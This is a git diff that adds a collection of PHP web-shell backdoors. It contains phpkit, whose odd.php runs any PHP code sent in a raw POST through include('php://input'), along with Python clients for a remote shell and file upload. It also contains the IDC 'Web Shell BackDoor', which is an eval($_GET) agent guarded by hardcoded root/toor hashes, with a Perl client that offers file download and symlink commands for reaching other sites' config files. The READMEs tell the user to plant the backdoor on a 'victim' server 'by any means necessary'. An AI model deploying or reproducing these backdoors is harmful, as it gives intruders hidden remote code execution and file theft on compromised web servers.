|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
|
||||
|
||||
phpkit-0.2a
|
||||
|
||||
Stealth PHP Backdooring Utility - Insecurety Research 2013
|
||||
|
||||
This is a simple kit to demonstrate a very effective way of
|
||||
backdooring a webserver running PHP.
|
||||
Essentially, it functions by parsing out any valid PHP code
|
||||
from raw HTTP POST data sent to it, and executing said PHP.
|
||||
|
||||
No eval() or other suspect calls are in the serverside script,
|
||||
the code is executed by the include() function. The php://input
|
||||
data stream (which is basically "anything sent via raw POST) is
|
||||
used to "capture" the raw POST data, and when parsed by include()
|
||||
the code sent is executed.
|
||||
|
||||
This allows for many things to be done, i.e. executing any PHP
|
||||
code you happen to write. The example client, phpkit.py, simply
|
||||
gives a "shell prompt" (non interactive, each command is executed
|
||||
in a new "context") on the victim server. It is trivial to write
|
||||
pretty much anything.
|
||||
|
||||
This release includes a massively overhauled backdoor client, it
|
||||
tests various execution functions against the victim host before
|
||||
using whatever one works first. It is massively ugly code, but
|
||||
I intend to clean it up soonish.
|
||||
|
||||
This release also includes a basic file uploader :)
|
||||
|
||||
USAGE (backdoor part):
|
||||
You upload "odd.php" to the target webserver by any means necessary.
|
||||
You then run ./phpkit.py <url to php file on server> and enjoy!
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
|
||||
|
||||
[+] URL in use: http://localhost/odd.php
|
||||
|
||||
[+] Testing system function
|
||||
[+] system() function works
|
||||
shell:~$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
shell:~$ uname -a
|
||||
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
|
||||
|
||||
USAGE (file uploader part):
|
||||
This assumes "odd.php" is loaded onto the victim webserver, obviously.
|
||||
You run ./upload.py <url to odd.php> <file to upload> <remote path>
|
||||
Only works if remote path is writeable. /tmp/ is always good :)
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
|
||||
[+] Uploading File
|
||||
[+] Upload should be complete
|
||||
|
||||
So the file uploaded, now I compare MD5sums to check did it bloody well work!
|
||||
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
|
||||
2568416e280af88f82e982efd46525a8 /etc/passwd
|
||||
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
|
||||
2568416e280af88f82e982efd46525a8 /tmp/pass
|
||||
|
||||
Seems legit bro ;)
|
||||
|
||||
TODO:
|
||||
MySQL client.
|
||||
|
||||
|
||||
Notes:
|
||||
In two use-cases this was shown to not function.
|
||||
Use Case A: Servers with the Suhosin PHP Hardening Patches.
|
||||
In this case, php://input and other URL inclusion vectors are rendered
|
||||
unuseable due to the protections the Suhosin patches offer. i.e. this
|
||||
tool don't work against Suhosin patched boxes.
|
||||
|
||||
Use Case B: Servers where php.ini is dictated by httpd.conf
|
||||
In several cases where the php.ini is specific to the HTTP daemon,
|
||||
runtime ini directive modification is not permissable. I have
|
||||
personally observed this behaviour on Apache thus far, however
|
||||
further testing/research is needed to find a workaround of some kind.
|
||||
|
||||
Please report if you have any issues getting this to work. Please
|
||||
test it on a server with allow_url_include = On , then if it works,
|
||||
set allow_url_include = Off , restart httpd, and check does it work.
|
||||
If it does not work, please report using the issue tracker at
|
||||
http://code.google.com/p/insecurety-research providing details of HTTPD
|
||||
configuration so I can attempt to figure out new things :)
|
||||
|
||||
Questions, comments, bug reports and abuse? infodox () insecurety.net
|
||||
|
||||
Licence: The do whatever you want with it, just don't rip code without
|
||||
giving credit licence.
|
10
php/phpkit-0.2a/odd.php
Normal file
10
php/phpkit-0.2a/odd.php
Normal file
|
@ -0,0 +1,10 @@
|
|||
// php://input based backdoor
|
||||
// uses include('php://input') to execute arbritary code
|
||||
// Any valid PHP code sent as raw POST data to backdoor is ran
|
||||
// overrides the php.ini settings using ini_set :)
|
||||
// Insecurety Research 2013 | insecurety.net
|
||||
<?php
|
||||
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
||||
// No eval() calls, no system() calls, nothing normally seen as malicious.
|
||||
include('php://input');
|
||||
?>
|
106
php/phpkit-0.2a/phpkit.py
Normal file
106
php/phpkit-0.2a/phpkit.py
Normal file
|
@ -0,0 +1,106 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twatter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
# version: 0.2a
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 2):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
tester = """echo w00tw00tw00t"""
|
||||
testkey = """w00tw00tw00t"""
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
|
||||
### ###
|
||||
# Whole Bunch of Functions #
|
||||
### ###
|
||||
def genphp(func, cmd):
|
||||
if func == "system":
|
||||
rawphp = """system('%s');""" %(cmd)
|
||||
elif func == "shellexec":
|
||||
rawphp = """echo shell_exec('%s');""" %(cmd)
|
||||
elif func == "passthru":
|
||||
rawphp = """passthru('%s');""" %(cmd)
|
||||
elif func == "exec":
|
||||
rawphp = """echo exec('%s');""" %(cmd)
|
||||
encodedphp = rawphp.encode('base64')
|
||||
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
|
||||
return payload
|
||||
|
||||
def test(url, tester, testkey): # This whole function is ugly as sin
|
||||
print "[+] Testing system()" # I need to make it tighter
|
||||
payload = genphp('system', tester) # No, really. Look at the waste
|
||||
r = requests.post(url, payload) # It could be TIIINY and fast!
|
||||
if testkey in r.text:
|
||||
print "[+] system() works, using system."
|
||||
func = 'system'
|
||||
return func
|
||||
else:
|
||||
print "[-] system() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
|
||||
payload = genphp('shellexec', tester) # THIS COULD BE TINY
|
||||
r = requests.post(url, payload) # But. Coffee is lacking
|
||||
if testkey in r.text:
|
||||
print "[+] shell_exec() works, using shell_exec"
|
||||
func = 'shellexec'
|
||||
return func
|
||||
else:
|
||||
print "[-] shell_exec() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing passthru()"
|
||||
payload = genphp('passthru', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] passthru() works, using passthru"
|
||||
func = 'passthru'
|
||||
return func
|
||||
else:
|
||||
print "[-] passthru() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing exec()"
|
||||
payload = genphp('exec', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] exec() works, using exec"
|
||||
func = 'exec'
|
||||
return func
|
||||
else:
|
||||
print "[-] exec() seems disabled :("
|
||||
pass
|
||||
|
||||
### ###
|
||||
# End of functions and object oriented stuff #
|
||||
### ###
|
||||
|
||||
# the main body
|
||||
func = test(url, tester, testkey)
|
||||
while True:
|
||||
try:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
try:
|
||||
payload = genphp(func, cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception Caught, I hope"
|
||||
sys.exit(0)
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception or CTRL+C Caught, I hope"
|
||||
print "[-] Exiting (hopefully) cleanly..."
|
||||
sys.exit(0)
|
34
php/phpkit-0.2a/upload.py
Normal file
34
php/phpkit-0.2a/upload.py
Normal file
|
@ -0,0 +1,34 @@
|
|||
#!/usr/bin/python
|
||||
# Upload.py
|
||||
# File Upload client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twatter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
# version: 0.2a
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 4):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
localfile = sys.argv[2]
|
||||
remotefile = sys.argv[3]
|
||||
|
||||
f = open(localfile, "r")
|
||||
rawfiledata = f.read()
|
||||
encodedfiledata = rawfiledata.encode('base64')
|
||||
|
||||
phppayload = """<?php
|
||||
$f = fopen("%s", "a");
|
||||
$x = base64_decode('%s');
|
||||
fwrite($f, "$x");
|
||||
fclose($f);
|
||||
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
|
||||
|
||||
print "[+] Uploading File"
|
||||
requests.post(url, phppayload) # this is why I love the python requests library
|
||||
print "[+] Upload should be complete"
|
97
php/phpkit-1.0/README.txt
Normal file
97
php/phpkit-1.0/README.txt
Normal file
|
@ -0,0 +1,97 @@
|
|||
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
|
||||
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
|
||||
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
|
||||
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
|
||||
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
|
||||
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
|
||||
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|
||||
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
|
||||
|
||||
phpkit-1.0
|
||||
|
||||
Stealth PHP Backdooring Utility - Insecurety Research 2013
|
||||
|
||||
This is a simple kit to demonstrate a very effective way of
|
||||
backdooring a webserver running PHP.
|
||||
Essentially, it functions by parsing out any valid PHP code
|
||||
from raw HTTP POST data sent to it, and executing said PHP.
|
||||
|
||||
No eval() or other suspect calls are in the serverside script,
|
||||
the code is executed by the include() function. The php://input
|
||||
data stream (which is basically "anything sent via raw POST) is
|
||||
used to "capture" the raw POST data, and when parsed by include()
|
||||
the code sent is executed.
|
||||
|
||||
This allows for many things to be done, i.e. executing any PHP
|
||||
code you happen to write. The example client, phpkitcli.py, offers
|
||||
file upload and a remote shell.
|
||||
|
||||
This release includes a massively overhauled backdoor client, it
|
||||
tests various execution functions against the victim host before
|
||||
using whatever one works first. It is massively ugly code, but
|
||||
I intend to clean it up soonish.
|
||||
|
||||
USAGE (backdoor part):
|
||||
You upload "odd.php" to the target webserver by any means necessary.
|
||||
You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
|
||||
|
||||
[+] URL in use: http://localhost/odd.php
|
||||
|
||||
[+] Testing system function
|
||||
[+] system() function works
|
||||
shell:~$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
shell:~$ uname -a
|
||||
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
|
||||
|
||||
USAGE (file uploader part):
|
||||
This assumes "odd.php" is loaded onto the victim webserver, obviously.
|
||||
You run:
|
||||
./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
|
||||
Only works if remote path is writeable. /tmp/ is always good :)
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
|
||||
[+] Uploading File
|
||||
[+] Upload should be complete
|
||||
|
||||
So the file uploaded, now I compare MD5sums to check did it bloody well work!
|
||||
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
|
||||
2568416e280af88f82e982efd46525a8 /etc/passwd
|
||||
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
|
||||
2568416e280af88f82e982efd46525a8 /tmp/pass
|
||||
|
||||
Seems legit bro ;)
|
||||
|
||||
TODO:
|
||||
MySQL client.
|
||||
|
||||
|
||||
Notes:
|
||||
In two use-cases this was shown to not function.
|
||||
Use Case A: Servers with the Suhosin PHP Hardening Patches.
|
||||
In this case, php://input and other URL inclusion vectors are rendered
|
||||
unuseable due to the protections the Suhosin patches offer. i.e. this
|
||||
tool don't work against Suhosin patched boxes.
|
||||
|
||||
Use Case B: Servers where php.ini is dictated by httpd.conf
|
||||
In several cases where the php.ini is specific to the HTTP daemon,
|
||||
runtime ini directive modification is not permissable. I have
|
||||
personally observed this behaviour on Apache thus far, however
|
||||
further testing/research is needed to find a workaround of some kind.
|
||||
|
||||
Please report if you have any issues getting this to work. Please
|
||||
test it on a server with allow_url_include = On , then if it works,
|
||||
set allow_url_include = Off , restart httpd, and check does it work.
|
||||
If it does not work, please report using the issue tracker at
|
||||
http://code.google.com/p/insecurety-research providing details of HTTPD
|
||||
configuration so I can attempt to figure out new things :)
|
||||
|
||||
Questions, comments, bug reports and abuse? infodox () insecurety.net
|
||||
|
||||
Licence: The do whatever you want with it, just don't rip code without
|
||||
giving credit licence.
|
5
php/phpkit-1.0/odd.php
Normal file
5
php/phpkit-1.0/odd.php
Normal file
|
@ -0,0 +1,5 @@
|
|||
<?php
|
||||
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
||||
// No eval() calls, no system() calls, nothing normally seen as malicious.
|
||||
include('php://input');
|
||||
?>
|
132
php/phpkit-1.0/phpkitcli.py
Normal file
132
php/phpkit-1.0/phpkitcli.py
Normal file
|
@ -0,0 +1,132 @@
|
|||
#!/usr/bin/python
|
||||
import argparse
|
||||
import requests
|
||||
import sys
|
||||
|
||||
help = """Connects to a phpkit backdoor and provides file upload or shell access"""
|
||||
parser = argparse.ArgumentParser(description=help)
|
||||
parser.add_argument("--url", help="URL of backdoor", required=True)
|
||||
parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
|
||||
parser.add_argument("--lfile", help="File to Upload (full path)")
|
||||
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
|
||||
args = parser.parse_args()
|
||||
|
||||
url = args.url
|
||||
mode = args.mode
|
||||
localfile = args.lfile
|
||||
remotefile = args.rfile
|
||||
|
||||
tester = """echo w00tw00tw00t"""
|
||||
testkey = """w00tw00tw00t"""
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
|
||||
### ###
|
||||
# Whole Bunch of Functions #
|
||||
### ###
|
||||
def genphp(func, cmd):
|
||||
if func == "system":
|
||||
rawphp = """system('%s');""" %(cmd)
|
||||
elif func == "shellexec":
|
||||
rawphp = """echo shell_exec('%s');""" %(cmd)
|
||||
elif func == "passthru":
|
||||
rawphp = """passthru('%s');""" %(cmd)
|
||||
elif func == "exec":
|
||||
rawphp = """echo exec('%s');""" %(cmd)
|
||||
encodedphp = rawphp.encode('base64')
|
||||
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
|
||||
return payload
|
||||
|
||||
def test(url, tester, testkey): # This whole function is ugly as sin
|
||||
print "[+] Testing system()" # I need to make it tighter
|
||||
payload = genphp('system', tester) # No, really. Look at the waste
|
||||
r = requests.post(url, payload) # It could be TIIINY and fast!
|
||||
if testkey in r.text:
|
||||
print "[+] system() works, using system."
|
||||
func = 'system'
|
||||
return func
|
||||
else:
|
||||
print "[-] system() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
|
||||
payload = genphp('shellexec', tester) # THIS COULD BE TINY
|
||||
r = requests.post(url, payload) # But. Coffee is lacking
|
||||
if testkey in r.text:
|
||||
print "[+] shell_exec() works, using shell_exec"
|
||||
func = 'shellexec'
|
||||
return func
|
||||
else:
|
||||
print "[-] shell_exec() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing passthru()"
|
||||
payload = genphp('passthru', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] passthru() works, using passthru"
|
||||
func = 'passthru'
|
||||
return func
|
||||
else:
|
||||
print "[-] passthru() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing exec()"
|
||||
payload = genphp('exec', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] exec() works, using exec"
|
||||
func = 'exec'
|
||||
return func
|
||||
else:
|
||||
print "[-] exec() seems disabled :("
|
||||
pass
|
||||
|
||||
###
|
||||
def shell(func):
|
||||
func = test(url, tester, testkey)
|
||||
while True:
|
||||
try:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
try:
|
||||
payload = genphp(func, cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception Caught, I hope"
|
||||
sys.exit(0)
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception or CTRL+C Caught, I hope"
|
||||
print "[-] Exiting (hopefully) cleanly..."
|
||||
sys.exit(0)
|
||||
|
||||
def upload(url, localfile, remotefile):
|
||||
f = open(localfile, "r")
|
||||
rawfiledata = f.read()
|
||||
encodedfiledata = rawfiledata.encode('base64')
|
||||
phppayload = """<?php
|
||||
$f = fopen("%s", "a");
|
||||
$x = base64_decode('%s');
|
||||
fwrite($f, "$x");
|
||||
fclose($f);
|
||||
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
|
||||
|
||||
print "[+] Uploading File"
|
||||
requests.post(url, phppayload) # this is why I love the python requests library
|
||||
print "[+] Upload should be complete"
|
||||
sys.exit(0)
|
||||
|
||||
def main(url, localfile, remotefile, mode):
|
||||
if mode == "UPLOAD":
|
||||
upload(url, localfile, remotefile)
|
||||
elif mode == "SHELL":
|
||||
func = test(url, test, testkey)
|
||||
shell(func)
|
||||
else:
|
||||
print "[-] Mode Invalid... Exit!"
|
||||
sys.exit(0)
|
||||
|
||||
main(url, localfile, remotefile, mode)
|
7
php/wsb/ReadMe.txt
Normal file
7
php/wsb/ReadMe.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
#Web Shell BackDoor
|
||||
For using this tool you must follow this steps :
|
||||
1- Upload the php Agent (idc.php) into server
|
||||
2- Run the perl script (wsb.pl) on your machine
|
||||
3- Give the address of the agent to the perl script
|
||||
4- Using this username and password : user :root , pass : toor
|
||||
5- Enter Your Commands;)
|
7
php/wsb/idc.php
Normal file
7
php/wsb/idc.php
Normal file
|
@ -0,0 +1,7 @@
|
|||
<?php
|
||||
$user="63a9f0ea7bb98050796b649e85481845"; #root
|
||||
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
|
||||
|
||||
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
|
||||
{eval($_GET['idc']);}
|
||||
?>
|
109
php/wsb/wsb.pl
Normal file
109
php/wsb/wsb.pl
Normal file
|
@ -0,0 +1,109 @@
|
|||
#IDC php BackDoor
|
||||
#Iranian Dark Coders Team
|
||||
#WwW.IDC-TeaM.NeT
|
||||
#Coded BY M.R.S.CO
|
||||
#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
|
||||
#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
print q (
|
||||
|
||||
__ __ __
|
||||
| | _|_ {_ |_ _|| |__} _ _| | \ _ _ _
|
||||
|/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}|
|
||||
|
||||
--=[Web Shell BackDoor]
|
||||
+---++---==[Version : 1.1]
|
||||
+---++---==[Coded by : M.R.S.CO]
|
||||
+---++---==[WwW.IDC-TeaM.Net]
|
||||
--=[Iranian Dark Coders Team]
|
||||
);
|
||||
use LWP::Simple;
|
||||
print "\nEnter Shell URL : ";
|
||||
chomp($url=<STDIN>);
|
||||
|
||||
print "\nEnter UserName : ";
|
||||
chomp($usr=<STDIN>);
|
||||
|
||||
print "Enter PassWord : ";
|
||||
chomp($pass=<STDIN>);
|
||||
|
||||
|
||||
print "\nStart analyze shell\n";
|
||||
@fun=("system","passthru","exec","shell_exec");
|
||||
$tf="false";
|
||||
foreach(@fun)
|
||||
{
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
|
||||
if ($source =~ m/idc-team/i){
|
||||
print "\nConected\nFor more information Enter \"help\"";
|
||||
do {
|
||||
print "\nWSB : ";
|
||||
chomp($cmd=<STDIN>);
|
||||
if ($cmd=~"help")
|
||||
{
|
||||
print q (
|
||||
================================================================
|
||||
|
||||
command Description
|
||||
------- --------------------------
|
||||
help The help command display the help menu
|
||||
getuid The 'getuid' command will display the user
|
||||
lpwd display the filename of the current working directory
|
||||
ps The 'ps' command display the list of running processes.
|
||||
shell It display the standard shell
|
||||
dir The 'dir' command List information about the FILEs
|
||||
download The 'download' command downloads a file from the remote machine
|
||||
sym The 'sym' command create a symlink
|
||||
);
|
||||
}elsif ($cmd=~"getuid"){
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
|
||||
print "\nUser id = $source";
|
||||
}elsif ($cmd=~"dir"){
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
|
||||
print "\n $source";
|
||||
}elsif ($cmd=~"lpwd"){
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
|
||||
print "\n$source";
|
||||
}elsif ($cmd=~"ps"){
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
|
||||
print "\n$source";
|
||||
}elsif ($cmd=~"exit"){
|
||||
exit 0;
|
||||
}elsif ($cmd=~"sym"){
|
||||
print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
|
||||
chomp($target=<STDIN>);
|
||||
print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
|
||||
chomp($sym=<STDIN>);
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
|
||||
print "\nSymlink \"$sym\" Was Created;)\n";
|
||||
}elsif ($cmd=~"download"){
|
||||
print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
|
||||
chomp($ff=<STDIN>);
|
||||
print "\nEnter Save Path : ";
|
||||
chomp($fp=<STDIN>);
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
|
||||
open (fdl, '>>'.$fp);
|
||||
print fdl "$source";
|
||||
close (fdl);
|
||||
print "\File \"$ff\" Was Downloaded to $fp\n";
|
||||
}elsif ($cmd=~"shell"){
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
|
||||
print "\n$source";
|
||||
do {
|
||||
print "\ncmd : ";
|
||||
chomp($cm=<STDIN>);
|
||||
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
|
||||
print "\n$source";
|
||||
if ($cm=~"exit"){goto ou;}
|
||||
}while ($==1)
|
||||
}else{
|
||||
print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
|
||||
}
|
||||
ou:;
|
||||
}while ($==1)
|
||||
}
|
||||
$tf="true";
|
||||
}
|
||||
if($tf="true") {print "Cant connect to server !!\n";}
|
1522
php/wso2.5.1.php
Normal file
1522
php/wso2.5.1.php
Normal file
File diff suppressed because it is too large
Load diff
Loading…
Reference in a new issue